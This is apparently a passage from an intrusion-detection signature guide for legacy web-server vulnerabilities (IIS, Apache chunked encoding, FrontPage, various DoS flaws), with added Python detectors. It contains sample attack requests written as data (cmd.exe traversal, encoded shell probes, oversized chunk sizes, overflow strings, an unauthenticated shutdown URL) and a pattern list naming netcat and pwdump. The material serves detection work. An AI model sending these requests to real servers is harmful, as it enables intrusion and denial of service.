IIS Sample File ftp.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "ftp.exe" pattern in
traffic sent to the HTTP server. ftp.exe is the Windows command-line FTP client, commonly invoked through cmd.exe
on a compromised host to fetch further tools.
Signature ID: 397
IIS Sample File ftpx.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "ftpx.exe" pattern in
traffic sent to the HTTP server.
Signature ID: 398
IIS Sample File pwdump.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "pwdump.exe" pattern in
traffic sent to the HTTP server. pwdump dumps the password hashes from the Windows SAM; a request for it under the
web root indicates credential-theft tooling on an already compromised host.
Signature ID: 399
IIS Sample File pwdump2.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "pwdump2.exe" pattern in
traffic sent to the HTTP server. pwdump2 is a later version of the pwdump hash-dumping tool; the same caveat as for
pwdump.exe applies.
Signature ID: 400
IIS Sample File pwdump3.exe vulnerability
Threat Level: Warning
Nessus: 11003
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This signature detects an
attempt to exploit potential weaknesses in a host running Microsoft IIS. Successful exploitation allows an attacker to
access sensitive information on the vulnerable system. This signature specifically detects the "pwdump3.exe" pattern in
traffic sent to the HTTP server. pwdump3 is a later version of the pwdump hash-dumping tool; the same caveat as for
pwdump.exe applies.
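The following Python is an added example, not code from this guide or from the TMS module (whose matching engine this guide does not describe). It checks one HTTP request line against the literal patterns of Signatures 385 through 400. Because these signatures match a fixed string, the request URI has to be canonicalised first: percent-encoding, double encoding, the double nibble encoding described under Signature 444, backslashes and '..' segments all hide the literal from a naive substring match. The signature table and the request lines are constructed for the example.

```python
"""Added example: matching the literal "pattern in the traffic" rules of
Signatures 385-400 against a canonicalised request URI.  This is not code
from the HP guide or the TMS module; the request lines below are constructed
for illustration."""
import re
from urllib.parse import unquote

# Literal patterns taken from the signature titles above (lower-cased,
# because IIS paths are case-insensitive and the match must be too).
SAMPLE_FILE_SIGNATURES = {
    385: "cmd.exe", 386: "root.exe", 387: "bin.exe", 388: "shell.exe",
    389: "hack.exe", 390: "nc.exe", 391: "ncx.exe", 392: "netcat.exe",
    393: "firedaemon.exe", 394: "fire.exe", 395: "fired.exe",
    396: "ftp.exe", 397: "ftpx.exe", 398: "pwdump.exe",
    399: "pwdump2.exe", 400: "pwdump3.exe",
}

_DOUBLE_NIBBLE = re.compile(r"%(?:%[0-9A-Fa-f]{2}){2}")  # e.g. %%34%31


def decode_double_nibble(s: str) -> str:
    """Rewrite %%XX%YY (Signature 444's double nibble encoding) as %HL,
    where XX and YY are the ASCII codes of the two hex digits H and L:
    '%%34%31' -> '%41'.  Done explicitly so the step is visible; a second
    generic percent-decode pass would also reach the same character."""
    def _sub(m):
        body = m.group(0)[1:]              # '%34%31'
        return "%" + chr(int(body[1:3], 16)) + chr(int(body[4:6], 16))
    return _DOUBLE_NIBBLE.sub(_sub, s)


def _collapse_path(path: str) -> str:
    """Resolve '.' and '..' segments and drop empty ones ('//')."""
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if len(out) > 1:
                out.pop()
        elif seg not in (".", "") or not out:
            out.append(seg)
    return "/".join(out)


def normalize_uri(uri: str) -> str:
    """Canonical form for matching: undo double nibble encoding, percent-
    decode twice (defeats %25-style double encoding), fold '\\' to '/',
    collapse '.' and '..' in the path, and lower-case the result."""
    s = decode_double_nibble(uri)
    for _ in range(2):
        s = unquote(s)
    s = s.replace("\\", "/")
    path, sep, query = s.partition("?")
    return (_collapse_path(path) + sep + query).lower()


def match_sample_file_signatures(request_line: str):
    """Return [(signature_id, pattern)] for every Signature 385-400 literal
    found in the canonicalised request-target of one HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    uri = normalize_uri(parts[1])
    return [(sid, pat) for sid, pat in sorted(SAMPLE_FILE_SIGNATURES.items())
            if pat in uri]


# Constructed request lines: three encodings of the same kind of probe that
# a raw substring match would miss, plus one benign request.
SAMPLE_REQUESTS = [
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/%%36%33md.exe?/c+dir HTTP/1.0",
    "GET /msadc/NC.EXE HTTP/1.1",
    "GET /default.htm HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(f"{line!r:66} -> {match_sample_file_signatures(line)}")
```

The second and third sample requests contain no literal "cmd.exe" on the wire; only after decoding does the string appear, which is why an inspection engine that matches these signatures has to normalise before it compares.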
Signature ID: 401
Apache Web Server Chunked Transfer Encoding Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2002-0392 Bugtraq: 5033 Nessus: 11030,12305
Signature Description: Apache is a web server that supports chunked transfer encoding as defined by the HTTP/1.1
standard. With chunked transfer encoding a sender can split the message body into chunks of arbitrary length and send
them separately. Apache HTTP Server versions 1.2.2 and later, 1.3 up to and including 1.3.24, and 2.0 up to and
including 2.0.36 are vulnerable to a heap buffer overflow in the handling of certain chunk-encoded HTTP requests. A
crafted HTTP request whose chunk length is greater than 0x7fffffff, sent to a vulnerable Apache server, may crash the
server or allow execution of arbitrary code. Upgrade to the latest version of Apache HTTP Server. Several operating
systems that bundle the Apache server are also affected; their respective vendors have released patches for this issue.
Note that the signature keys on the chunk-size field, so it is meaningful only on requests whose headers carry
Transfer-Encoding: chunked; a large hex string elsewhere in a request body is not an exploit attempt.
Signature ID: 402
Chunked encoding Handling Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0079 CVE-2002-0071 CVE-2002-0392 Bugtraq: 4485,4474,5033 Nessus:
11030,10935,10932,10943,12305
Signature Description: Chunked transfer encoding is one of several ways in which an HTTP server may transmit data to
its clients. Normally, data delivered in HTTP responses is sent in one piece whose length is indicated by the
Content-Length header field. The length of the data matters because the client needs to know where the response ends
and any following response starts. With chunked encoding, however, the data is broken up into a series of blocks and
transmitted in one or more 'chunks', so that a server may start sending data before it knows the final size of the content
it is sending. IIS is a set of Internet-based services produced by Microsoft for servers running Microsoft Windows. The
Apache HTTP Server is a web server developed and maintained by an open community of developers under the auspices
of the Apache Software Foundation. Apache Web Server versions 1.2.x to 2.0.36 (inclusive) contain a flaw that allows a
remote attacker to execute arbitrary code: the code that calculates the size of "chunked" data does not correctly interpret
the size of the buffer being transferred. By sending a specially crafted chunk, an attacker can execute arbitrary code or
crash the server. Microsoft Internet Information Server (IIS) versions 4.0 and 5.0 are vulnerable to a heap-based buffer
overflow in the function that implements chunked-encoding transfers, which is part of the ISAPI (Internet Server
Application Programming Interface) extension that implements Active Server Pages (ASP). By sending a specially
crafted chunk that causes an incorrect buffer size to be allocated, a remote attacker could overflow a buffer and execute
arbitrary code on the system or cause the IIS service to fail.
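As an added example (not code from this guide or from the TMS module, and not a model of the vulnerable servers), the following Python walks a chunked request body and reports the condition Signatures 401 and 402 describe, and that Signature 437 below describes for IIS: a chunk-size field larger than 0x7fffffff. That threshold is the largest positive signed 32-bit value, so a larger size reads as a negative length in code that stores it in a signed 32-bit integer; the helper as_int32 shows that view. The checker runs only when the headers actually declare Transfer-Encoding: chunked. The two requests are constructed for the example.

```python
"""Added example: a checker for HTTP/1.1 chunked transfer encoding that
reports the condition Signatures 401, 402 and 437 describe, a chunk-size
field larger than 0x7fffffff.  This is not code from the HP guide or the
TMS module, and it does not model the vulnerable servers; the requests
below are constructed for illustration."""
import re

SIGNED_32_MAX = 0x7FFFFFFF
# chunk-size is hex digits, optionally followed by ";" chunk-extensions
_SIZE_LINE = re.compile(rb"^([0-9A-Fa-f]+)(?:;.*)?$")


def as_int32(value: int) -> int:
    """Two's-complement view of a value stored in a signed 32-bit int,
    which is how a chunk size above 0x7fffffff turns into a negative
    length (0xFFFFFFF0 -> -16)."""
    return ((value + (1 << 31)) & 0xFFFFFFFF) - (1 << 31)


def check_chunked_body(body: bytes):
    """Walk a chunked body.  Returns (alerts, payload): alerts lists the
    first problem found (if any); payload is the data decoded before it."""
    alerts, payload, pos = [], b"", 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            alerts.append("truncated: no CRLF after chunk-size at offset %d" % pos)
            return alerts, payload
        m = _SIZE_LINE.match(body[pos:eol])
        if not m:
            alerts.append("malformed chunk-size line %r" % body[pos:eol])
            return alerts, payload
        size = int(m.group(1), 16)
        if size > SIGNED_32_MAX:
            alerts.append("chunk size 0x%x exceeds 0x7fffffff (reads as %d in a "
                          "signed 32-bit int)" % (size, as_int32(size)))
            return alerts, payload
        pos = eol + 2
        if size == 0:                      # last-chunk; trailers not parsed
            return alerts, payload
        chunk = body[pos:pos + size]
        if len(chunk) < size:
            alerts.append("truncated chunk: declared %d bytes, got %d" % (size, len(chunk)))
            return alerts, payload
        payload += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            alerts.append("missing CRLF after chunk data at offset %d" % pos)
            return alerts, payload
        pos += 2


def check_request(raw: bytes):
    """Split a raw request; run the chunk checker only when the headers
    actually declare Transfer-Encoding: chunked (a hex string in an
    ordinary body is not a chunk-size field and must not alert)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = [h.lower() for h in head.split(b"\r\n")[1:]]
    chunked = any(h.startswith(b"transfer-encoding:") and b"chunked" in h
                  for h in headers)
    if not chunked:
        return [], body
    return check_chunked_body(body)


# Constructed requests: a well-formed chunked POST and one whose first
# chunk-size is 0xFFFFFFF0, the kind of value the signature is looking for.
GOOD_REQUEST = (b"POST /cgi-bin/form HTTP/1.1\r\nHost: www.example.com\r\n"
                b"Transfer-Encoding: chunked\r\n\r\n"
                b"5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n")
BAD_REQUEST = (b"POST /cgi-bin/form HTTP/1.1\r\nHost: www.example.com\r\n"
               b"Transfer-Encoding: chunked\r\n\r\n"
               b"FFFFFFF0\r\n" + b"A" * 64 + b"\r\n0\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("good", GOOD_REQUEST), ("bad", BAD_REQUEST)):
        alerts, payload = check_request(req)
        print(name, alerts or "no alert", payload)
```

The checker stops at the first problem rather than trying to resynchronise, which is the safe choice for an inspection engine: once a chunk-size field is untrustworthy, nothing after it can be located reliably.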
Signature ID: 403
BugZilla DoEditVotes.CGI Login Error Information Leak Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0011 Bugtraq: 3800
Signature Description: Bugzilla is a bug-tracking database program developed by Mozilla for reporting and assigning
bugs. A vulnerability in the doeditvotes.cgi script in Bugzilla versions 2.14 and earlier could allow a remote attacker to
obtain sensitive information: when a login to doeditvotes.cgi fails, the response discloses information to the user that
may be used for malicious purposes.
Signature ID: 404
Microsoft IIS HTR ISAPI Extension Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0071 Bugtraq: 4474 Nessus: 10932,10943
Signature Description: HTR is a server-side scripting technology for IIS that has largely been supplanted by ASP. A
buffer overflow in the ism.dll ISAPI extension that implements HTR scripting in Internet Information Server (IIS) 4.0
and 5.0 allows attackers to cause a denial of service or execute arbitrary code via HTR requests with long variable
names; code executed this way runs with the privileges of the IWAM_computername account.
Signature ID: 409
Microsoft IIS Front Page Server Extension DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0096 Bugtraq: 2144 Nessus: 10585
Signature Description: Microsoft IIS ships with FrontPage Server Extensions (FPSE), which give administrators remote
and local management of web pages and content. Browse-time support is a further FPSE feature that provides users
with functional web applications. FPSE is vulnerable to a remote denial of service attack usually called the 'malformed
web submission' vulnerability: by supplying malformed data to one of the FPSE functions, an attacker causes IIS to
stop responding. A restart of the service is required to restore normal operation.
Signature ID: 410
AnalogX Web server Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0011 CVE-2000-0243 Bugtraq: 906,1076 Nessus: 10366
Signature Description: AnalogX SimpleServer:WWW is designed to be a simple web server for Microsoft Windows
operating environments. A remote attacker can connect to SimpleServer (for example with telnet) and make an invalid
request to the server: a request consisting of about 640 '\x40' characters crashes the web server and potentially leads
to a buffer overflow condition. The vulnerable version is AnalogX SimpleServer:WWW 1.16.0.
Signature ID: 412
Xylogics Annex Terminal Server DoS vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1070 Nessus: 10017
Signature Description: Bay Networks (Xylogics) Annex terminal servers are high-performance remote access servers
that carry dial-up traffic over both the public network and the Internet. For dial access they offer multi-protocol
support, letting service providers use one or more industry-standard network protocols along with a full array of digital
and analog remote access options. Several DoS attacks have been found against Annex terminal servers from Xylogics
(Bay). The vulnerability lies in the ping CGI interface of the built-in web server in the Xylogics Annex terminal
servers, which does not validate user input properly. It is possible to crash the remote Annex terminal server by
connecting to the HTTP port and requesting the '/ping' CGI with an over-long argument (at least 64 characters). The
vulnerable platform is the Xylogics Annex Terminal Server.
Signature ID: 413
CISCO Switch View-source DoS Vulnerability
Threat Level: Warning
Nessus: 10682
Signature Description: Cisco switches have a web interface for managing the device remotely. A few switch software
versions suffer from a DoS vulnerability: on receiving an HTTP request for the URI
"http://switch-server/cgi-bin/view-source?/", the switch crashes and performs a software reload, and network
connectivity is disrupted. By repeatedly sending such HTTP requests, a denial of service attack can be performed
against the switch and the entire network connected to it. Cisco Internetwork Operating System Software IOS (tm),
C2900XL Software (C2900XL-H2S-M), Version 12.0(5.1)XP is a vulnerable platform.
Signature ID: 414
Cisco 675 DSL Router DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0058 Nessus: 10561
Signature Description: Cisco Broadband Operating System (CBOS) is the operating system for Cisco 600 series routers.
The Cisco 600 series routers are small office/home office (SOHO)/telecommuter DSL routers. The web interface of
Cisco 600 series routers running CBOS 2.4.1 and earlier allows remote attackers to cause a denial of service via a URL
that does not end in a space character. It is possible to lock the remote server with the request: GET ? \r\n\r\n. The
administrator needs to reboot the device to make it work again. An attacker may use this flaw to crash the host and so
prevent the network from working properly.
Signature ID: 415
Domino HTTP Denial of Service by sending long URL vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0023 Bugtraq: 0881 Nessus: 10059,10406
Signature Description: The Lotus Domino HTTP server can be used as a traditional web server, serving static HTML
documents and handling cgi-bin scripts. These features are turned on by default and use the /cgi-bin virtual path,
mapped to the <NOTESDATA>\domino\cgi-bin directory. The server contains a flaw that may allow a remote denial of
service: the issue is triggered when a very long URL for a non-existent page is requested in the /cgi-bin directory, and
results in loss of availability for the platform. Lotus Domino Server 4.6.x on Microsoft Windows NT 4.0 is the
vulnerable platform.
Signature ID: 416
Eicon DivaLAN ISDN modem DoS vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1533 Bugtraq: 665 Nessus: 10062
Signature Description: Eicon Technology Corporation sells a variety of connectivity products, one of which is an ISDN
modem (the DIVA ISDN modem). This modem was found to be vulnerable to a remote denial of service attack that
renders it useless until a hard reset is done to the device. With the default configuration, only users on the local
network can perform this attack. The vendor has fixed this vulnerability and new firmware is available. The attack
sends a GET request with the URI /login.htm?password=AA[....]AAA, where the 'A' is repeated 200 times. Diva LAN
ISDN Modem 1.0 release 2.5 is affected by this vulnerability.
Signature ID: 417
SalesLogix Eviewer WebApplication admin access vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0278 Bugtraq: 1089 Nessus: 10361
Signature Description: The SalesLogix eViewer is a web-based application that provides a web interface to SalesLogix
data. eViewer does not perform authorization on administrative commands if they are requested directly in the URL.
For example, it is possible to stop the remote server by requesting GET /scripts/slxweb.dll/admin?command=shutdown.
An attacker may use this flaw to issue admin commands without any authentication. SalesLogix Corporation eViewer
1.0 is vulnerable to this issue.
Signature ID: 418
Microsoft FrontPage/IIS shtml.dll Denial Of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0709 Bugtraq: 1608 Nessus: 10497
Signature Description: Microsoft FrontPage Server Extensions let users manage their web site remotely. FrontPage
2000 Server Extensions is vulnerable to a remote denial of service attack. By requesting a URL through the shtml.exe
component of FrontPage 2000 Server Extensions, an attacker can overflow a buffer, and can also determine the physical
path of the server components by including a DOS device name in the GET request. The signature tracks the attack as a
sequence: the attacker first sends a GET request with a URI containing /_vti_bin/shtml.exe; once the server responds,
the attacker sends /_vti_bin/shtml.exe/aux.htm, and then /_vti_bin/shtml.exe again. If the server no longer responds,
the sequence is treated as an attack. As a result of the attack, FrontPage operations slow down and the server shows
100 percent CPU utilization until the GET request times out.
Signature ID: 419
Novell GroupWise buffer overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0146 Bugtraq: 972 Nessus: 10097
Signature Description: Novell GroupWise is a cross-platform collaboration and messaging system. Novell GroupWise
5.5 with Enhancement Pack installed is vulnerable to a denial of service attack. The Denial of Service attack occurs
when a large character string is sent by a browser and is processed by the servlet gateway, causing the server to abend,
CPU usage to increase to 100%, or the post office service to crash. The server will require a reboot to recover from the
attack. Novell Groupwise Enhancement Pack 5.5 is vulnerable.
Signature ID: 421
IIS 5.0 PROPFIND DoS Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0151 CVE-2001-0508 Bugtraq: 2453,2690,2483 Nessus: 10667,10631,10732
Signature Description: WebDAV is an extension to the HTTP protocol that allows remote authoring and management
of web content. In the Windows 2000 implementation of the protocol, IIS 5.0 performs initial processing of all
WebDAV requests, then forwards the appropriate commands to the WebDAV process. It is possible to disable the
remote IIS server with a variation of a specially formed PROPFIND request: WebDAV contains a flaw in the handling
of certain malformed requests, and submitting multiple malformed WebDAV requests can cause the server to stop
responding. A successful attack causes a denial of service. Microsoft IIS 5.0 is vulnerable.
Signature ID: 422
AVM Ken! Proxy DoS vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0262 CVE-2000-0261 Bugtraq: 1103 Nessus: 10375
Signature Description: AVM Ken! is a proxy server for Windows that allows multiple users to share an ISDN
connection. A local attacker could cause a denial of service by sending random characters to port 3128. This attack
crashes the software and closes all connections to the server. AVM Ken! versions prior to 1.04.32 are affected by this
issue.
Signature ID: 423
Netscape Enterprise Server SSL Buffer Overflow DoS Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0752 Bugtraq: 516 Nessus: 10155
Signature Description: Netscape Enterprise Server was a web server developed originally by Netscape
Communications Corporation. Netscape Enterprise Server versions 3.0, 3.51, and 3.6 are vulnerable to a denial of
service attack. It suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the
buffer is overrun.
Signature ID: 424
Nortel Contivity HTTP Server DoS vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0064 CVE-2000-0063 Bugtraq: 938 Nessus: 10160
Signature Description: Nortel Contivity series network devices (extranet switches) ship with an httpd, running on top
of VxWorks, that provides an interface for remote administration. The cgiproc CGI script in the Nortel Contivity HTTP
server allows remote attackers to cause a denial of service via a malformed URL that includes shell metacharacters: if
metacharacters such as "!" or "$" are passed to cgiproc, the system crashes because the characters are not escaped.
Signature ID: 425
Oracle Web Server 2.1 DoS vulnerability
Threat Level: Severe
Industry ID: CVE-1999-1068 Nessus: 10171
Signature Description: Oracle Web Server version 2.1 is vulnerable to a denial of service attack. It is possible to crash
the remote web server by supplying a long argument to the CGI /ews-bin/fnord. An attacker may use this flaw to
prevent access to the web site.
Signature ID: 426
Real Networks RealServer View-Source DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0474 Bugtraq: 1288 Nessus: 10461
Signature Description: RealNetworks RealServer (Helix Server) is a multi-format, cross-platform streaming server for
delivering media to wired and wireless devices. It is vulnerable to a denial of service: a remote attacker can crash
RealServer 7.0 by requesting a file with no variable set, after which the server must be restarted. The attacker sends a
GET request with the URI /viewsource/template.html? to the RealServer HTTP port (TCP 8080 by default); once the
service has processed this request it stops responding. The vulnerable platforms are RealNetworks RealServer 7.0.0,
7.0.1 and 8.0.0 Beta.
Signature ID: 427
Xylogics/Bay Annex Ping CGI Overflow vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1070
Signature Description: Bay Networks, a Nortel Networks subsidiary, acquired and supports a terminal server solution
from Xylogics called the Annex server. Annex servers allow remote users to obtain dial-up connections to a network;
they may also allow network clients to dial out of the network, and are thus attractive targets for attackers. Some
versions of the Annex software are susceptible to a denial of service attack involving the server's built-in web server:
vulnerable Annex versions support a "ping" CGI program which, when fed an overly long query, overflows an internal
buffer and disables the entire access server.
Signature ID: 428
ETL Delegate Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0165 Bugtraq: 808 Nessus: 10054
Signature Description: DeleGate is a multi-purpose application-level gateway, or proxy server, which runs on multiple
platforms (Unix, Windows, Mac OS X and OS/2). DeleGate is a versatile application-level proxy, but it contains
unchecked buffers that can be exploited to compromise the server remotely. An attacker can execute arbitrary code on
the DeleGate server through the DeleGate port(s), or from a malicious server that a user accesses through the DeleGate
proxy. The code runs with the user ID of the 'delegated' process. Example: whois://a b 1 AAAA..AAAAA. This problem
may allow an attacker to gain a shell on the computer and then mount a local attack to escalate privileges further.
Signature ID: 429
IIS FrontPage fp30reg.dll Chunked Overflow vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0341 CVE-2003-0822 Bugtraq: 2906,9007 Nessus: 10699
Signature Description: Microsoft FrontPage is an HTML editor and web site administration tool from Microsoft for
Windows. FrontPage Server Extensions allow Microsoft FrontPage clients to communicate with web servers and provide
additional functionality intended for web sites. Microsoft FrontPage Server Extensions (FPSE) for Windows NT and
Windows 2000 are vulnerable to a buffer overflow in the Visual Studio RAD (Remote Application Deployment) Support
sub-component. FrontPage Server Extensions are used with Microsoft Internet Information Server (IIS) versions 4.0
and 5.0. When the FPSE DLL fp30reg.dll receives a URL request longer than 258 bytes whose Transfer-Encoding header
specifies chunked data, a stack-based buffer overflow occurs. An attacker could exploit this vulnerability to execute
arbitrary code on the system and possibly gain complete control over the affected web server. Apply the appropriate
patch for your system, as listed in Microsoft Security Bulletin MS03-051.
Signature ID: 431
Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2001-0500 Bugtraq: 2880 Nessus: 10685,10695,10713
Signature Description: Microsoft Internet Information Services (IIS) is a web server application for the Windows
platform. A remotely exploitable buffer overflow vulnerability exists in the ISAPI (Internet Server Application
Programming Interface) extension IDQ.DLL installed with most versions of IIS 4.0 and 5.0. IIS installs IDQ.DLL as
part of the installation process even though it is a component of Index Server (known in Windows 2000 as Indexing
Service); it provides support for administrative scripts (.ida files) and Internet Data Queries (.idq files). The
vulnerability results because idq.dll contains an unchecked buffer in a section of code that handles input URLs. The
buffer overrun occurs before any indexing functionality is requested, so even though idq.dll is a component of Index
Server/Indexing Service, that service need not be running for an attacker to exploit the vulnerability. Remote attackers
can exploit it to gain complete control of an affected server by sending a specially crafted request for .ida or .idq files.
Successful exploitation results in execution of arbitrary code on the victim machine with SYSTEM privileges. The
"Code Red" and "Code Red II" worms actively exploited this vulnerability.
Signature ID: 432
Oracle Application Server Shared Library Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0419 Bugtraq: 2569 Nessus: 10654
Signature Description: An exploitable buffer overflow exists in a shared library shipped with Oracle Application
Server 4.0.8.2 and used by iPlanet Web Server when it is configured as the external web listener. The overflow occurs
when a long string is requested with a prefix that has been 'linked' to OAS (by default /jsp/), which is then passed to
the library routines for processing. The buffer size is around 2050-2060 bytes.
Signature ID: 433
OpenLink 3.2 Web Config Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0943 Nessus: 10169
Signature Description: OpenLink is open source and commercial middleware software. Both the Unix and Windows NT
versions of OpenLink 3.2 are vulnerable to a remotely exploitable buffer overflow. The problem is in the web
configuration utility and is the result of an unchecked strcpy() call. The consequence is execution of arbitrary code on
the target host (running the configuration utility) with the privileges of the web software, by sending one of these two
requests: GET AAA[....]AAA or GET /cgi-bin/testcono?AAAAA[...]AAA HTTP/1.0. This rule detects a malicious
attempt of the second type.
Signature ID: 437
IIS ASP Chunked Encoding Heap Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0079 CVE-2002-0147 CVE-2002-0149 Bugtraq: 4485,4478,4490 Nessus: 10935
Signature Description: A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active
Server Pages has been reported for Microsoft IIS versions 4.0 and 5.0. Exploitation of this vulnerability may result in a
denial of service or allow a remote attacker to execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is
reported to ship with a default script (iisstart.asp) that may be sufficient for a remote attacker to exploit; other sample
scripts may also be exploitable.
Signature ID: 438
IPlanet Webserver .shtml Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2000-1077 Bugtraq: 1848 Nessus: 10538
Signature Description: iPlanet Web Server is an HTTP server product of the Sun-Netscape Alliance. By sending a
specially crafted HTTP request of approximately 198 - 240 characters for a file with the (default) .shtml extension, it is
possible to cause a buffer overflow and execute arbitrary code. This is due to the way iPlanet parses .shtml files. The
vulnerability is only known to be exploitable if the server-side 'parsing' option is enabled. An attacker may use this
flaw to gain a shell on the host. iPlanet E-Commerce Solutions iPlanet Web Server 4.0 is vulnerable.
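Several signatures in this section are not content matches but length thresholds on a particular path: Signature 412 (at least 64 characters to /ping), 416 (200 'A's in the password parameter of /login.htm), 429 (a fp30reg.dll URL longer than 258 bytes together with a chunked Transfer-Encoding header) and 438 (a request of about 198 to 240 characters for a .shtml file). The following Python is an added example, not code from this guide or from the TMS module, that writes those four as one rule table and evaluates a raw request against it. The thresholds are the figures the descriptions give; taking 198 as the lower bound for Signature 438 is this example's reading of the approximate range, and the requests are constructed for illustration.

```python
"""Added example: the length-threshold style of rule behind Signatures 412
(Annex /ping), 416 (Eicon login.htm password), 429 (fp30reg.dll with chunked
encoding) and 438 (iPlanet .shtml), written as a rule table and one evaluator.
Not code from the HP guide or the TMS module; the thresholds are the figures
the descriptions give, the requests are constructed for illustration."""
from urllib.parse import urlsplit, parse_qs


def _query_len(parts):
    """Length of everything after '?' (the CGI argument for /ping)."""
    return len(parts.query)


def _target_len(parts):
    """Length of the whole request-target, path plus query."""
    return len(parts.path) + (len(parts.query) + 1 if parts.query else 0)


def _param_len(name):
    """Length of one named query parameter (longest value if repeated)."""
    def measure(parts):
        values = parse_qs(parts.query, keep_blank_values=True).get(name, [""])
        return max(len(v) for v in values)
    return measure


# (signature id, path must contain, measure, minimum length, needs chunked TE)
# 412: at least 64 characters to /ping;  416: 200 'A's in password=;
# 429: URL longer than 258 bytes and Transfer-Encoding: chunked;
# 438: request of about 198-240 characters for a .shtml file (198 is taken
#      as the lower bound; the description gives only the approximate range).
LENGTH_RULES = [
    (412, "/ping", _query_len, 64, False),
    (416, "/login.htm", _param_len("password"), 200, False),
    (429, "fp30reg.dll", _target_len, 259, True),
    (438, ".shtml", _target_len, 198, False),
]


def parse_request(raw: str):
    """Split a raw HTTP request into (method, request-target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def evaluate_length_rules(raw: str):
    """Return the ids of every rule in LENGTH_RULES that the request trips."""
    _method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    chunked = "chunked" in headers.get("transfer-encoding", "").lower()
    hits = []
    for sig_id, needle, measure, minimum, needs_chunked in LENGTH_RULES:
        if needle not in parts.path.lower():
            continue
        if needs_chunked and not chunked:
            continue
        if measure(parts) >= minimum:
            hits.append(sig_id)
    return hits


# Constructed requests, one per rule (the fp30reg.dll one only alerts when
# the chunked header is present).
ANNEX_REQUEST = "GET /ping?" + "A" * 64 + " HTTP/1.0\r\nHost: annex\r\n\r\n"
EICON_REQUEST = "GET /login.htm?password=" + "A" * 200 + " HTTP/1.0\r\nHost: diva\r\n\r\n"
FPSE_REQUEST = ("POST /_vti_bin/_vti_aut/fp30reg.dll/" + "A" * 240 + " HTTP/1.1\r\n"
                "Host: www.example.com\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
IPLANET_REQUEST = "GET /" + "A" * 200 + ".shtml HTTP/1.0\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("annex", ANNEX_REQUEST), ("eicon", EICON_REQUEST),
                      ("fpse", FPSE_REQUEST), ("iplanet", IPLANET_REQUEST)):
        print(name, evaluate_length_rules(req))
```

Keeping the path condition, the measured quantity and the header condition separate is what lets the fp30reg.dll rule stay quiet on an ordinary long URL to that DLL and alert only when the chunked header that the overflow depends on is also present.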
Signature ID: 439
Squid Cache FTP Proxy URL Buffer Overflow Vulnerability
